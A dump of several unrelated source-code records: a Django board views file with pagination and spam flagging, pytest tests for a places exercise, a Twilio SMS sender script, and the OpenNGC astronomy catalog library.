ApplyWriteForm()\n\t\tcontext={'form':form}\n\t\treturn render(request, 'board/apply_post_write.html', context)\n\ndef collected(request):\n\ts=request.META.get('HTTP_USER_AGENT', '')\n\tprint(s)\n\tprint(s.find('waxingmodel_app'))\n\tposts = Collected.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Collected.objects.all().exclude(is_spam=True).order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/collected.html', context)\n\ndef collected_post_read(request):\n\tcollected_post_id = request.GET.get('collected_post_id')\n\tif collected_post_id:\n\t\tpost = Collected.objects.get(id = collected_post_id)\n\t\tif post.is_spam:\n\t\t\tpost.content = '스팸처리된 게시글입니다.'\n\t\tcontext={'post':post}\n\t\treturn render(request, 'board/collected_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/collected')\n\ndef collected_make_spam(request):\n\tcollected_id = request.GET.get('collected_id')\n\tspam_target = Collected.objects.get(id=collected_id)\n\tspam_target.is_spam = True\n\tspam_target.save()\n#\toriginal_url = request.GET.get('original_url')\n#\treturn render(request, 'board/collected_post_read.html', context)\n\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))","sub_path":"waxingmodel/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"287087126","text":"from solution import collect_places\nfrom io import StringIO\nimport sys\n\nempty_place_inputs = StringIO(\"\\n\")\none_place_input = StringIO(\"London, England\\n\\n\")\nmany_place_inputs = StringIO(\n \"\"\"Shanghai, China\nBeijing, China\nTel Aviv, Israel\nHaifa, Israel\nMadrid, Spain\nBarcelona, Spain\n\n\"\"\"\n)\n\n\ndef test_no_places(monkeypatch):\n monkeypatch.setattr(\"sys.stdin\", empty_place_inputs)\n collect_places()\n assert len(solution.visits) == 0\n\n\ndef test_one_place(monkeypatch):\n monkeypatch.setattr('sys.stdin', one_place_input)\n solution.collect_places()\n assert len(solution.visits) == 1\n\ndef test_many_places(monkeypatch):\n monkeypatch.setattr('sys.stdin', many_place_inputs)\n solution.collect_places()\n assert len(solution.visits) == 3\n\ndef test_invalid_input(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('abcd\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n assert captured_out.strip().startswith(\"Tell me where you went: That's not a legal city, country combination\")\n assert captured_out.strip().endswith(\"Tell me where you went:\")\n\ndef test_sorting_cities(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Shanghai, China\\nBeijing, China\\nBeijing, China\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n beijing_index = captured_out.index('Beijing')\n shanghai_index = captured_out.index('Shanghai')\n assert beijing_index < shanghai_index\n\ndef test_sorting_countries(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Haifa, Israel\\nLondon, England\\nNew York, USA\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n israel_index = captured_out.index('Israel')\n england_index = captured_out.index('England')\n usa_index = captured_out.index('USA')\n assert england_index < israel_index\n assert israel_index < usa_index\n\n\ndef test_counting(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Shanghai, China\\nBeijing, China\\nBeijing, China\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n assert len(solution.visits['China']) == 2\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n assert 'Beijing (2)' in captured_out\n assert 'Shanghai' in captured_out\n","sub_path":"reuven_lerner_problems/oop/week_1/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"33131800","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\nfrom settings import Keys\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = Keys.TWILIO_ACCOUNT_SID\nauth_token = Keys.TWILIO_AUTH_TOKEN\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"mauricio is awesome\",\n from_=Keys.TWILIO_SEND_PHONE_NUM,\n to=Keys.TWILIO_REC_PHONE_NUM,\n )\n\nprint(message.sid)\n","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"534141794","text":"# -*- coding:utf-8 -*-\n#\n# MIT License\n#\n# Copyright (c) 2017 Mattia Verga \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n\"\"\"Provides classes and functions to access OpenNGC database.\n\nClasses provided:\n * Dso: the main class which describe a single row (object) from OpenNGC database.\n\nMethods provided:\n * getNeighbors: Find all neighbors of a object within a user selected range.\n * getSeparation: Calculate the apparent angular separation between two objects.\n * listObjects: Query DB for DSObjects with specific parameters.\n * printDetails: Prints a detailed description of the object in a formatted output.\n * searchAltId: Search a object in the database using an alternative identifier.\n\"\"\"\n\nfrom pkg_resources import resource_filename\nimport numpy as np\nimport re\nimport sqlite3\n\n__version__ = '0.3.1'\nDBDATE = 20190303 # Version of database data\nDBPATH = resource_filename(__name__, 'ongc.db')\n\n\nclass Dso(object):\n \"\"\"Defines a single Deep Sky Object from ONGC database.\n\n A DSO object represents a single row from OpenNGC database, which corresponds to\n a Deep Sky Object from NGC or IC catalogs.\n\n The class provides the following methods to access object data:\n * __init__: Object constructor.\n * __str__: Returns basic data of the object as a formatted string.\n * getConstellation: Returns the constellation where the object is located.\n * getCoords: Returns the coordinates of the object in J2000 Epoch as numpy array.\n * getCStarData: Returns data about central star of planetary nebulaes.\n * getDec: Returns the Declination in J2000 Epoch in string format.\n * getDimensions: Returns object axes dimensions and position angle.\n * getHubble: Returns the Hubble classification of the galaxy.\n * getId: Returns the database Id of the object.\n * getIdentifiers: Returns the alternative identifiers of the object.\n * getMagnitudes: Returns the magnitudes of the object.\n * getName: Returns the main identifier of the object.\n * getNotes: Returns notes from NED and from ONGC author.\n * getSurfaceBrightness: Returns the surface brightness value of the galaxy.\n * getType: Returns the type of the object.\n * getRA: Returns the Right Ascension in J2000 Epoch in string format.\n * xephemFormat: Returns object data in Xephem format.\n \"\"\"\n\n def __init__(self, name, returndup=False):\n \"\"\"Object constructor.\n\n :param string name: identifier of the NGC or IC object\n :optional param returndup: if True don't resolve Dup objects\n \"\"\"\n # Make sure user passed a string as parameter\n if not isinstance(name, str):\n raise TypeError('Wrong type as parameter. A string type was expected.')\n\n # Make sure object name is written in correct form\n nameParts = re.match(r'^((?:NGC|IC)\\s?)(\\d{1,4})\\s?((NED)(\\d{1,2})|[A-Z]{1,2})?$',\n name.upper())\n if nameParts is None:\n raise ValueError('Wrong object name. Please insert a valid NGC or IC object name.')\n\n if nameParts.group(3) is not None:\n # User searches for a sub-object\n if nameParts.group(4) is not None:\n # User searches for a NED suffixed component\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n + ' '\n + nameParts.group(4)\n + '{:0>2}'.format(nameParts.group(5))\n )\n else:\n # User searches a letter suffixed component\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n + nameParts.group(3).strip()\n )\n else:\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n )\n\n cols = ('objects.id, objects.type, objTypes.typedesc, ra, dec, const, majax, minax, '\n 'pa, bmag, vmag, jmag,hmag, kmag, sbrightn, hubble, cstarumag, cstarbmag, '\n 'cstarvmag, messier, ngc, ic, cstarnames,identifiers, commonnames, nednotes, '\n 'ongcnotes')\n tables = 'objects JOIN objTypes ON objects.type = objTypes.type'\n params = 'name=\"' + objectname + '\"'\n objectData = _queryFetchOne(cols, tables, params)\n\n if objectData is None:\n raise ValueError('Object named ' + objectname + ' not found in the database.')\n\n # If object is a duplicate then return the main object\n if objectData[1] == \"Dup\" and not returndup:\n if objectData[20] != \"\":\n objectname = \"NGC\" + str(objectData[20])\n else:\n objectname = \"IC\" + str(objectData[21])\n params = 'name=\"' + objectname + '\"'\n objectData = _queryFetchOne(cols, tables, params)\n\n # Assign object properties\n self._id = objectData[0]\n self._name = objectname\n self._type = objectData[2]\n\n # R.A. can be empty for NonEx objects only\n if self._type == \"Nonexistent object\" and objectData[3] == \"\":\n self._ra = None\n else:\n try:\n self._ra = np.array([float(x) for x in objectData[3].split(':')])\n except Exception:\n raise ValueError('There must be some error in the database: '\n + 'I can\\'t recognize R.A. data of object '\n + self._name)\n\n # Declination can be empty for NonEx objects only\n if self._type == \"Nonexistent object\" and objectData[4] == \"\":\n self._dec = None\n else:\n try:\n self._dec = np.array([float(x) for x in objectData[4].split(':')])\n except Exception:\n raise ValueError('There must be some error in the database: '\n + 'I can\\'t recognize Declination data of object '\n + self._name)\n\n self._const = objectData[5]\n\n # These properties may be empty\n self._majax = objectData[6]\n self._minax = objectData[7]\n self._pa = objectData[8]\n self._bmag = objectData[9]\n self._vmag = objectData[10]\n self._jmag = objectData[11]\n self._hmag = objectData[12]\n self._kmag = objectData[13]\n self._sbrightn = objectData[14]\n self._hubble = objectData[15]\n self._cstarumag = objectData[16]\n self._cstarbmag = objectData[17]\n self._cstarvmag = objectData[18]\n self._messier = objectData[19]\n self._ngc = objectData[20]\n self._ic = objectData[21]\n self._cstarnames = objectData[22]\n self._identifiers = objectData[23]\n self._commonnames = objectData[24]\n self._nednotes = objectData[25]\n self._ongcnotes = objectData[26]\n\n def __str__(self):\n \"\"\"Returns basic data of the object.\n\n >>> s = Dso(\"ngc1\")\n >>> print(s)\n NGC0001, Galaxy in Peg\n\n \"\"\"\n return (self._name + \", \" + self._type + \" in \" + self._const)\n\n def getConstellation(self):\n \"\"\"Returns the constellation where the object is located.\n\n :returns: 'constellation'\n\n >>> s = Dso(\"ngc1\")\n >>> s.getConstellation()\n 'Peg'\n\n \"\"\"\n return self._const\n\n def getCoords(self):\n \"\"\"Returns the coordinates of the object in J2000 Epoch as numpy array.\n\n :returns: array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n\n >>> s = Dso(\"ngc1\")\n >>> s.getCoords()\n array([[ 0. , 7. , 15.84],\n [27. , 42. , 29.1 ]])\n\n \"\"\"\n if self._ra is None or self._dec is None:\n raise ValueError('Object named ' + self._name + ' has no coordinates in database.')\n return np.array([self._ra, self._dec, ])\n\n def getCStarData(self):\n \"\"\"Returns data about central star of planetary nebulaes.\n\n :returns: ([cstar identifiers], cstar UMag, cstar BMag, cstar VMag)\n\n If the DSO object is a Planetary Nebulae, this method will return a tuple with\n the central star identifiers and its magnitudes in U-B-V bands:\n\n >>> s = Dso(\"ngc1535\")\n >>> s.getCStarData()\n (['BD -13 842', 'HD 26847'], None, 12.19, 12.18)\n\n If the object is not a PN it returns all None values:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getCStarData()\n (None, None, None, None)\n\n \"\"\"\n if self._cstarnames != \"\":\n identifiers = list(map(str.strip, self._cstarnames.split(\",\")))\n else:\n identifiers = None\n\n return identifiers, self._cstarumag, self._cstarbmag, self._cstarvmag\n\n def getDec(self):\n \"\"\"Returns the Declination in J2000 Epoch in string format.\n\n :returns: '+/-DD:MM:SS.s'\n\n If you need the raw data use getCoords() method.\n\n >>> s = Dso(\"ngc1\")\n >>> s.getDec()\n '+27:42:29.1'\n\n >>> s = Dso(\"ngc6991\")\n >>> s.getDec()\n 'N/A'\n\n \"\"\"\n if self._dec is not None:\n return '{:+03.0f}:{:02.0f}:{:04.1f}'.format(*self._dec)\n else:\n return 'N/A'\n\n def getDimensions(self):\n \"\"\"Returns a tuple with object axes dimensions (float) and position angle (int).\n\n :returns: (MajAx, MinAx, P.A.)\n\n Where values are not available a None type is returned.\n\n >>> s = Dso(\"ngc1\")\n >>> s.getDimensions()\n (1.57, 1.07, 112)\n\n \"\"\"\n return self._majax, self._minax, self._pa\n\n def getHubble(self):\n \"\"\"Returns the Hubble classification of the object.\n\n :returns: string\n\n >>> s = Dso(\"ngc1\")\n >>> s.getHubble()\n 'Sb'\n\n \"\"\"\n return self._hubble\n\n def getId(self):\n \"\"\"Returns the database Id of the object.\n\n :returns: int\n\n >>> s = Dso(\"ngc1\")\n >>> s.getId()\n 5612\n\n \"\"\"\n return self._id\n\n def getIdentifiers(self):\n \"\"\"Returns a tuple of alternative identifiers of the object.\n\n :returns: ('Messier', [NGC], [IC], [common names], [other])\n\n If a field is empty a None type is returned:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getIdentifiers()\n (None, None, None, None, ['2MASX J00071582+2742291', 'IRAS 00047+2725', \\\n'MCG +04-01-025', 'PGC 000564', 'UGC 00057'])\n\n \"\"\"\n if self._messier == \"\":\n messier = None\n else:\n messier = \"M\" + self._messier\n\n if self._ngc == \"\":\n ngc = None\n else:\n ngc = list(map(str.strip, self._ngc.split(\",\")))\n ngc = list(map(lambda number: \"NGC\" + number, ngc))\n\n if self._ic == \"\":\n ic = None\n else:\n ic = list(map(str.strip, self._ic.split(\",\")))\n ic = list(map(lambda number: \"IC\" + number, ic))\n\n if self._commonnames == \"\":\n commonNames = None\n else:\n commonNames = list(map(str.strip, self._commonnames.split(\",\")))\n\n if self._identifiers == \"\":\n other = None\n else:\n other = list(map(str.strip, self._identifiers.split(\",\")))\n\n return messier, ngc, ic, commonNames, other\n\n def getMagnitudes(self):\n \"\"\"Returns the magnitudes of the object as a tuple of floats.\n\n :returns: (Bmag, Vmag, Jmag, Hmag, Kmag)\n\n Where values are not available a None type is returned:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getMagnitudes()\n (13.4, None, 10.78, 10.02, 9.76)\n\n \"\"\"\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag\n\n def getName(self):\n \"\"\"Returns the main identifier of the object.\n\n :returns: string\n\n >>> s = Dso(\"ngc1\")\n >>> s.getName()\n 'NGC0001'\n\n \"\"\"\n return self._name\n\n def getNotes(self):\n \"\"\"Returns notes from NED and from ONGC author.\n\n :returns: ('nednotes', 'ongcnotes')\n\n >>> s = Dso(\"ngc6543\")\n >>> s.getNotes()\n ('Additional radio sources may contribute to the WMAP flux.', \\\n'Dimensions taken from LEDA')\n\n \"\"\"\n return self._nednotes, self._ongcnotes\n\n def getSurfaceBrightness(self):\n \"\"\"Returns the surface brightness value of the object.\n\n :returns: float or None\n\n >>> s = Dso(\"ngc1\")\n >>> s.getSurfaceBrightness()\n 23.13\n\n \"\"\"\n return self._sbrightn\n\n def getType(self):\n \"\"\"Returns the type of the object.\n\n :returns: string\n\n >>> s = Dso(\"ngc1\")\n >>> s.getType()\n 'Galaxy'\n\n \"\"\"\n return self._type\n\n def getRA(self):\n \"\"\"Returns the Right Ascension in J2000 Epoch in string format.\n\n :returns: 'HH:MM:SS.ss'\n\n If you need the raw data use getCoords() method.\n\n >>> s = Dso(\"ngc1\")\n >>> s.getRA()\n '00:07:15.84'\n\n >>> s = Dso(\"ngc6991\")\n >>> s.getRA()\n 'N/A'\n\n \"\"\"\n if self._ra is not None:\n return '{:02.0f}:{:02.0f}:{:05.2f}'.format(*self._ra)\n else:\n return 'N/A'\n\n def xephemFormat(self):\n \"\"\"Returns object data in Xephem format.\n\n :returns: string\n\n This function will produce a string containing information about the object\n suitable to be imported in other software that accept Xephem format\n (for example: PyEphem).\n\n >>> s = Dso(\"ngc1\")\n >>> s.xephemFormat()\n 'NGC0001,f|G,00:07:15.84,+27:42:29.1,13.4,,94.2|64.2|1.07'\n\n \"\"\"\n line = []\n # Field 1: names\n names = [self.getName()]\n identifiers = self.getIdentifiers()\n if identifiers[0] is not None:\n names.append(identifiers[0])\n for i in range(1, 4):\n if identifiers[i] is not None:\n names.extend(identifiers[i])\n line.append(\"|\".join(names))\n\n # Field 2: type designation\n objType = self.getType()\n if objType in (\"Galaxy Pair\", \"Galaxy Triplet\", \"Group of galaxies\"):\n line.append(\"f|A\")\n elif objType == \"Globular Cluster\":\n line.append(\"f|C\")\n elif objType == \"Double star\":\n line.append(\"f|D\")\n elif objType in (\"HII Ionized region\", \"Nebula\"):\n line.append(\"f|F\")\n elif objType == \"Galaxy\":\n if self.getHubble().startswith(\"S\"):\n line.append(\"f|G\")\n else:\n line.append(\"f|H\")\n elif objType == \"Dark Nebula\":\n line.append(\"f|K\")\n elif objType in (\"Emission Nebula\", \"Reflection Nebula\"):\n line.append(\"f|N\")\n elif objType in (\"Association of stars\", \"Open Cluster\"):\n line.append(\"f|O\")\n elif objType == \"Planetary Nebula\":\n line.append(\"f|P\")\n elif objType == \"Supernova remnant\":\n line.append(\"f|R\")\n elif objType == \"Star\":\n line.append(\"f|S\")\n elif objType == \"Star cluster + Nebula\":\n line.append(\"f|U\")\n else:\n line.append(\"f\")\n\n # Field 3: Right Ascension\n line.append(self.getRA())\n\n # Field 4: Declination\n line.append(self.getDec())\n\n # Field 5: Magnitude\n # We use the first available magnitude in the sequence b,v,j,h,k\n for mag in self.getMagnitudes():\n if mag is not None:\n line.append(str(mag))\n break\n\n # Field 6: optional Epoch, we let it empty\n line.append(\"\")\n\n # Field 7: Dimensions\n dimensions = []\n # Xephem format wants axes espressed in arcsec, we have arcmin\n for value in (self.getDimensions()[0], self.getDimensions()[1]):\n if value is not None:\n dimensions.append(str(value*60))\n else:\n dimensions.append(\"\")\n if self.getDimensions()[2] is not None:\n dimensions.append(str(value))\n else:\n dimensions.append(\"\")\n line.append(\"|\".join(dimensions))\n\n return \",\".join(line)\n\n\ndef _distance(coords1, coords2):\n \"\"\"Calculate distance between two points in the sky.\n\n :param coords1: A.R. and Dec of the first point as numpy array\n array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n :param coords2: A.R. and Dec of the second point as numpy array\n array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n :returns: (float: angular separation, float: difference in A.R, float: difference in Dec)\n \"\"\"\n a1 = np.radians(np.sum(coords1[0] * [15, 1/4, 1/240]))\n a2 = np.radians(np.sum(coords2[0] * [15, 1/4, 1/240]))\n if np.signbit(coords1[1][0]):\n d1 = np.radians(np.sum(coords1[1] * [1, -1/60, -1/3600]))\n else:\n d1 = np.radians(np.sum(coords1[1] * [1, 1/60, 1/3600]))\n if np.signbit(coords2[1][0]):\n d2 = np.radians(np.sum(coords2[1] * [1, -1/60, -1/3600]))\n else:\n d2 = np.radians(np.sum(coords2[1] * [1, 1/60, 1/3600]))\n\n # separation = np.arccos(np.sin(d1)*np.sin(d2) + np.cos(d1)*np.cos(d2)*np.cos(a1-a2))\n # Better precision formula\n # see http://aa.quae.nl/en/reken/afstanden.html\n separation = 2*np.arcsin(np.sqrt(np.sin((d2-d1)/2)**2 +\n np.cos(d1)*np.cos(d2)*np.sin((a2-a1)/2)**2))\n\n return np.degrees(separation), np.degrees(a2-a1), np.degrees(d2-d1)\n\n\ndef _limiting_coords(coords, radius):\n \"\"\"Write query filters for limiting search to specific area of the sky.\n\n :param coords: A.R. and Dec of the point in the sky\n array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n :param int radius: radius in degrees\n :returns string: parameters to be added to query\n\n This is a quick method to exclude objects farther than a specified distance\n from the starting point, but it's not meant to be precise.\n \"\"\"\n ra_lower_limit_deg = np.sum(coords[0] * [15, 1/4, 1/240]) - radius\n if ra_lower_limit_deg < 0:\n ra_lower_limit_deg += 360\n ra_lower_limit_hour = np.floor_divide(ra_lower_limit_deg, 15)\n ra_upper_limit_deg = np.sum(coords[0] * [15, 1/4, 1/240]) + radius\n if ra_upper_limit_deg > 360:\n ra_upper_limit_deg -= 360\n ra_upper_limit_hour = np.floor_divide(ra_upper_limit_deg, 15)\n if coords[0][0] == ra_lower_limit_hour or coords[0][0] == ra_upper_limit_hour:\n params = (' AND (ra LIKE \"{:02.0f}:%\"'\n ' OR ra LIKE \"{:02.0f}:%\")'.format(ra_lower_limit_hour,\n ra_upper_limit_hour))\n else:\n params = (' AND (ra LIKE \"{:02.0f}:%\"'\n ' OR ra LIKE \"{:02.0f}:%\"'\n ' OR ra LIKE \"{:02.0f}:%\")'.format(ra_lower_limit_hour,\n coords[0][0],\n ra_upper_limit_hour))\n\n if np.signbit(coords[1][0]):\n dec_lower_limit = np.sum(coords[1] * [1, -1/60, -1/3600]) - radius\n dec_upper_limit = np.sum(coords[1] * [1, -1/60, -1/3600]) + radius\n else:\n dec_lower_limit = np.sum(coords[1] * [1, 1/60, 1/3600]) - radius\n dec_upper_limit = np.sum(coords[1] * [1, 1/60, 1/3600]) + radius\n dec_lower_limit_str = '{:+03.0f}'.format(np.trunc(dec_lower_limit))\n dec_upper_limit_str = '{:+03.0f}'.format(np.trunc(dec_upper_limit))\n obj_limit_str = '{:+03.0f}'.format(coords[1][0])\n params += (' AND (dec LIKE \"{}_:%\"'\n ' OR dec LIKE \"{}_:%\"'\n ' OR dec LIKE \"{}_:%\")'.format(dec_lower_limit_str[:2],\n obj_limit_str[:2],\n dec_upper_limit_str[:2]))\n return params\n\n\ndef _queryFetchOne(cols, tables, params):\n \"\"\"Search one row in database.\n\n :param string cols: the SELECT field of the query\n :param string tables: the FROM field of the query\n :param string params: the WHERE field of the query\n :returns: tuple with selected row data from database\n \"\"\"\n try:\n db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n except sqlite3.Error:\n raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n try:\n cursor = db.cursor()\n cursor.execute('SELECT ' + cols\n + ' FROM ' + tables\n + ' WHERE ' + params\n )\n objectData = cursor.fetchone()\n except Exception as err:\n raise err\n finally:\n db.close()\n\n return objectData\n\n\ndef _queryFetchMany(cols, tables, params):\n \"\"\"Search many rows in database.\n\n :param string cols: the SELECT field of the query\n :param string tables: the FROM field of the query\n :param string params: the WHERE field of the query\n :returns: generator object yielding a tuple with selected row data from database\n \"\"\"\n try:\n db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n except sqlite3.Error:\n raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n try:\n cursor = db.cursor()\n\n cursor.execute('SELECT ' + cols\n + ' FROM ' + tables\n + ' WHERE ' + params\n )\n while True:\n objectList = cursor.fetchmany()\n if objectList == []:\n break\n yield objectList[0]\n except Exception as err:\n raise err\n finally:\n db.close()\n\n\ndef _str_to_coords(text):\n \"\"\"Convert a string to coordinates\n\n :param string text: a string expressing coordinates in the form\n \"HH:MM:SS.ss +/-DD:MM:SS.s\"\n :returns: array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n \"\"\"\n pattern = re.compile(r'^(?:(\\d{1,2}):(\\d{1,2}):(\\d{1,2}(?:\\.\\d{1,2})?))\\s'\n r'(?:([+-]\\d{1,2}):(\\d{1,2}):(\\d{1,2}(?:\\.\\d{1,2})?))$')\n result = pattern.match(text)\n\n if result:\n return np.array([np.array([float(x) for x in result.groups()[0:3]]),\n np.array([float(x) for x in result.groups()[3:6]])\n ])\n else:\n raise ValueError('This text cannot be recognized as coordinates: ' + text)\n\n\ndef getNeighbors(obj, separation, catalog=\"all\"):\n \"\"\"Find all neighbors of a object within a user selected range.\n\n :param object: a Dso object or a string which identifies the object\n :param float separation: maximum distance from the object expressed in arcmin\n :param optional string catalog: filter for \"NGC\" or \"IC\" objects - default is all\n :returns: list of Dso objects within limits ordered by distance [(Dso, separation),]\n\n This function is used to find all objects within a specified range from a given object.\n It requires an object as the starting point of the search (either a string containing\n the name or a Dso type) and a search radius expressed in arcmins.\n The maximum allowed search radius is 600 arcmin (10 degrees).\n It returns a list of of tuples with the Dso objects found in range and its distance,\n or an empty list if no object is found:\n\n >>> s1 = Dso(\"ngc521\")\n >>> getNeighbors(s1, 15) #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.13726168561780452), \\\n(<__main__.Dso object at 0x...>, 0.24140243942744602)]\n\n >>> getNeighbors(\"ngc521\", 1)\n []\n\n The optional \"catalog\" parameter can be used to filter the search to only NGC or IC objects:\n\n >>> getNeighbors(\"ngc521\", 15, catalog=\"NGC\") #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.24140243942744602)]\n\n \"\"\"\n if not isinstance(obj, Dso):\n if isinstance(obj, str):\n obj = Dso(obj)\n else:\n raise TypeError('Wrong type obj. Either a Dso or string type was expected.')\n if not (isinstance(separation, int) or isinstance(separation, float)):\n raise TypeError('Wrong type separation. Either a int or float type was expected.')\n if separation > 600:\n raise ValueError('The maximum search radius allowed is 10 degrees.')\n\n cols = 'objects.name'\n tables = 'objects'\n params = 'type != \"Dup\" AND name !=\"{}\"'.format(obj.getName())\n if catalog.upper() in [\"NGC\", \"IC\"]:\n params += ' AND name LIKE \"{}%\"'.format(catalog.upper())\n\n objCoords = obj.getCoords()\n params += _limiting_coords(objCoords, np.ceil(separation / 60))\n\n neighbors = []\n for item in _queryFetchMany(cols, tables, params):\n possibleNeighbor = Dso(item[0])\n distance = getSeparation(obj, possibleNeighbor)[0]\n if distance <= (separation / 60):\n neighbors.append((possibleNeighbor, distance))\n\n return sorted(neighbors, key=lambda neighbor: neighbor[1])\n\n\ndef getSeparation(obj1, obj2, style=\"raw\"):\n \"\"\"Finds the apparent angular separation between two objects.\n\n :param obj1: first Dso object or string identifier\n :param obj2: second Dso object or string identifier\n :param opt string style: use \"text\" to return a string with degrees, minutes and seconds\n :returns: if style=\"raw\": (float: angular separation, float: difference in A.R,\n float: difference in Dec)\n :returns: if style=\"text\": 'DD° MMm SS.SSs'\n\n This function will compute the apparent angular separation between two objects,\n either identified with their names as strings or directly as Dso type.\n By default it returns a tuple containing the angular separation and the differences in A.R.\n and Declination expressed in degrees:\n\n >>> s1 = Dso(\"ngc1\")\n >>> s2 = Dso(\"ngc2\")\n >>> getSeparation(s1, s2)\n (0.03008927371519897, 0.005291666666666788, -0.02972222222221896)\n\n >>> getSeparation(\"ngc1\", \"ngc2\")\n (0.03008927371519897, 0.005291666666666788, -0.02972222222221896)\n\n With the optional parameter \"style\" set to \"text\", it returns a formatted string:\n\n >>> getSeparation(\"ngc1\", \"ngc2\", style=\"text\")\n '0° 1m 48.32s'\n\n If one of the objects is not found in the database it returns a ValueError:\n\n >>> getSeparation(\"ngc1a\", \"ngc2\")\n Traceback (most recent call last):\n ...\n ValueError: Object named NGC0001A not found in the database.\n\n \"\"\"\n if not isinstance(obj1, Dso):\n if isinstance(obj1, str):\n obj1 = Dso(obj1)\n else:\n raise TypeError('Wrong type obj1. Either a Dso or string type was expected.')\n if not isinstance(obj2, Dso):\n if isinstance(obj2, str):\n obj2 = Dso(obj2)\n else:\n raise TypeError('Wrong type obj2. Either a Dso or string type was expected.')\n\n coordsObj1 = obj1.getCoords()\n coordsObj2 = obj2.getCoords()\n\n separation = _distance(coordsObj1, coordsObj2)\n\n if style == \"text\":\n d = int(separation[0])\n md = abs(separation[0] - d) * 60\n m = int(md)\n s = (md - m) * 60\n return str(d) + \"° \" + str(m) + \"m \" + \"{:.2f}\".format(s) + \"s\"\n else:\n return separation\n\n\ndef listObjects(**kwargs):\n \"\"\"Query the database for DSObjects with specific parameters.\n\n :param optional string catalog: filter for catalog. [NGC|IC|M]\n :param optional string type: filter for object type. See OpenNGC types list.\n :param optional string constellation: filter for constellation\n (three letter latin form - e.g. \"And\")\n :param optional float minsize: filter for objects with MajAx >= minSize(arcmin)\n :param optional float maxsize: filter for objects with MajAx < maxSize(arcmin)\n OR MajAx not available\n :param optional float uptobmag: filter for objects with B-Mag brighter than value\n :param optional float uptovmag: filter for objects with V-Mag brighter than value\n :param optional bool withname: filter for objects with common names\n :returns: [Dso,]\n\n This function returns a list of all DSObjects that match user defined parameters.\n If no argument is passed to the function, it returns all the objects from the database:\n\n >>> objectList = listObjects()\n >>> len(objectList)\n 13954\n\n Filters are combined with \"AND\" in the query; only one value for filter is allowed:\n\n >>> objectList = listObjects(catalog=\"NGC\", constellation=\"Boo\")\n >>> len(objectList)\n 281\n\n Duplicated objects are not resolved to main 